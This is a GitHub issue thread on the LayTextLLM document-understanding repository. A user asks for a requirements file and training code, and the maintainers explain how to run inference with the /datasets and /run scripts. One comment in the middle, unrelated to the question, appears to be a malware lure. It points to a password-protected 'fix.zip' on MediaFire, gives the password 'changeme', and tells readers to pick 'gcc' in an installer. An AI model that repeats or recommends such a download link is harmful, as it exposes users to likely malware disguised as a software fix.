### ISSUE TITLE
any plans to better organize this repo & provide training code?

### ISSUE THREAD

**Issue by mehamednews** [LayTextLLM/LayTextLLM#10]
Hi,
Great paper!
I've read & tested other paper models for ducument understanding (InterVL2, DocOWL...) & I'd like to compare how they perform compared to your approach. However, I don't see a requirements.txt file nor did I find the training code (to fine tune on the same datasets as other models).

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by LayTextLLM** [comment]
Hello,

To test LayTextLLM, you can create the dataset in JSON format similar to the examples in the /datasets directory. After that, run the appropriate bash script in the /run directory. The inference code will automatically download the model from Hugging Face and save the results.

We’ve also updated the dependencies in the README.

If you need to perform training, you can easily modify the inference code to implement the training procedure. You can refer to the hyperparameters mentioned in the paper.
